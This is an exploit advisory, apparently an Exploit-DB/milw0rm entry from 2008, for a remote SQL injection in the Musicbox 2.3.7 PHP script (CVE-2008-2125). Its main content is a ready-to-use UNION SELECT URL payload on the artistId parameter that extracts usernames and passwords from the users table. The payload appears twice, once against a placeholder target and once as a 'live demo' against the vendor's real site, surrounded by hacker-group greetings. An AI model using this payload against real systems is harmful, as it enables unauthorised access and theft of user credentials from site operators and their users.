Musicbox <= 2.3.7 artistId Remote SQL Injection Vulnerability

2008-05-07T00:00:00
ID EDB-ID:5560
Type exploitdb
Reporter HaCkeR_EgY
Modified 2008-05-07T00:00:00

Description

Musicbox <= 2.3.7 (artistId) Remote SQL Injection Vulnerability. CVE-2008-2125. Webapps exploit for php platform

                                        
                                            #########################################
#    Rem0te SQL Injection Vulnerability                           #
#       Musicbox [viewalbums.php]                                 #
########################################

[&lt;&gt;]Author: HaCkeR-EgY
 
[&lt;&gt;]H^0mE: www.pal-hacker.com ,  atsdp.com
 
[&lt;&gt;]CONTact: hacker_EGY@hotmail.com 
===========================================================
[&lt;&gt;]Script : Musicbox
 
[&lt;&gt;]version : Version 2.3.6 / 2.3.7
 
[&lt;&gt;]Script Price: Only $ 255.00
 
[&lt;&gt;]Download : www.musicboxv2.com
============================================================
 
[&lt;&gt;] D0RK : ... you know
 
[&lt;&gt;] ExPLO!t :
             
  ===&gt;
http://www.target.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10/**/from/**/users/*
 
 
[&lt;&gt;] live DemO :
            
  ===&gt;
  http://www.musicboxv2.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10/**/from/**/users/*
 
==============================================================
[&lt;&gt;] Thanx : MY Brotha and MY Master " Abo Mohamed "
 
[&lt;&gt;] Greetz : F!resell , Mohamed el Arab ,Mr.EXE , DaRk MaStEr ,H-T Team
                   Gold_M , V4 Team , Jiki Team  , RoMaNcYxHaCkEr
===============================================================

# milw0rm.com [2008-05-07]